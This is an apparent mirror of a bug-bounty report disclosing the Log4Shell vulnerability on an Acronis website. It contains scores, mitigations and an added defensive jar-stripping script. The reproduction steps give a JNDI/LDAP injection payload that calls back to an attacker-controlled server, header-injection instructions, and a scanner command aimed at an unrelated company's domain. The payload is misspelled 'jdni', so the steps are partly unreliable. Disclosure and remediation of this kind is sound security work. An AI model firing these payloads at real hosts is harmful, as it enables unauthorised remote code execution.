HackerOne report H1:1425474 by rhinestonecowboy, Dec 13, 2021 - 11:42 p.m.

Acronis: [CVE-2021-44228] nps.acronis.com is vulnerable to the recent log4shell 0-day

Reported: 2021-12-13 23:42:16
Reporter: rhinestonecowboy
Source: hackerone.com
Bounty: $1000
114

CVSS3: 10 High
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: NONE
User Interaction: NONE
Scope: CHANGED
Confidentiality Impact: HIGH
Integrity Impact: HIGH
Availability Impact: HIGH
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

CVSS2: 9.3 High
Access Vector: NETWORK
Access Complexity: MEDIUM
Authentication: NONE
Confidentiality Impact: COMPLETE
Integrity Impact: COMPLETE
Availability Impact: COMPLETE
Vector: AV:N/AC:M/Au:N/C:C/I:C/A:C

EPSS: 0.976 High
Percentile: 100.0%

Summary

The website at nps.acronis.com is vulnerable to CVE-2021-44228

Steps To Reproduce

I used this script to find this. It spins up an interact-sh server to receive the callback and sends the payload in the query string and about 30 different headers. You can reproduce manually with curl and interact-sh/Burp Collaborator/a server you control. However, since the callback is proof of the vulnerability, the script makes it easier to identify. Let me know if you want me to tell you which specific header fires the payload and I will test them.

  1. Construct the payload: ${jdni:ldap://nps.acronis.com.<your-server>/test}
  2. Inject the payload in the Request Headers (User-Agent, X-Forwarded-For, etc.) or use the script from fullscan: python3 log4j-scan.py -u 'https://marketingportal.engelvoelkers.com'
  3. Observe the callback, proving the deserialization of untrusted data which leads to RCE

{F1544482}

Recommendations

Update log4j to the latest version
If updating to the latest version is not possible the vulnerability can be mitigated by removing the JndiLookup class from the class path. Additionally, the issue can be mitigated on Log4j versions >=2.10 by setting the system property log4j2.formatMsgNoLookups or the LOG4J_FORMAT_MSG_NO_LOOKUPS environment variable to true.

Impact

Remote Code Execution (RCE)
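As an added, defender-side illustration of the first recommendation (removing JndiLookup from the class path), the script below inspects a log4j-core jar for the JndiLookup class, reports the manifest version, and rewrites the jar without that class. This is example code, not from the report or from Acronis; the jar it checks is a constructed stand-in built in a temp directory, not a real Log4j build.

```python
"""Check a log4j-core jar for the JndiLookup class and strip it if present.
Added example for the report's first recommendation; the sample jar is a
constructed stand-in, not a real Log4j build."""
import os
import tempfile
import zipfile

JNDI_LOOKUP = "org/apache/logging/log4j/core/lookup/JndiLookup.class"

def jar_version(jar_path):
    """Return Implementation-Version from the jar manifest, or None."""
    with zipfile.ZipFile(jar_path) as zf:
        if "META-INF/MANIFEST.MF" not in zf.namelist():
            return None
        manifest = zf.read("META-INF/MANIFEST.MF").decode("utf-8", "replace")
    for line in manifest.splitlines():
        if line.startswith("Implementation-Version:"):
            return line.split(":", 1)[1].strip()
    return None

def has_jndi_lookup(jar_path):
    """True if the jar still ships JndiLookup, i.e. the lookup is still reachable."""
    with zipfile.ZipFile(jar_path) as zf:
        return JNDI_LOOKUP in zf.namelist()

def strip_jndi_lookup(jar_path):
    """Rewrite the jar without JndiLookup.class (zipfile cannot delete in place)."""
    tmp_path = jar_path + ".tmp"
    with zipfile.ZipFile(jar_path) as src, zipfile.ZipFile(tmp_path, "w") as dst:
        for item in src.infolist():
            if item.filename != JNDI_LOOKUP:
                dst.writestr(item, src.read(item.filename))
    os.replace(tmp_path, jar_path)

def make_sample_jar(version="2.14.1"):
    """Constructed stand-in with the layout of log4j-core; not a real build."""
    path = os.path.join(tempfile.mkdtemp(), "log4j-core-%s.jar" % version)
    with zipfile.ZipFile(path, "w") as zf:
        zf.writestr("META-INF/MANIFEST.MF",
                    "Manifest-Version: 1.0\nImplementation-Version: %s\n" % version)
        zf.writestr(JNDI_LOOKUP, b"\xca\xfe\xba\xbe")  # placeholder class bytes
    return path

if __name__ == "__main__":
    jar = make_sample_jar()
    print(jar, jar_version(jar), "JndiLookup present:", has_jndi_lookup(jar))
    strip_jndi_lookup(jar)
    print("JndiLookup present after strip:", has_jndi_lookup(jar))
```

Run it against a real log4j-core jar path to confirm the class is gone; upgrading to a fixed release remains the primary fix, as the report states.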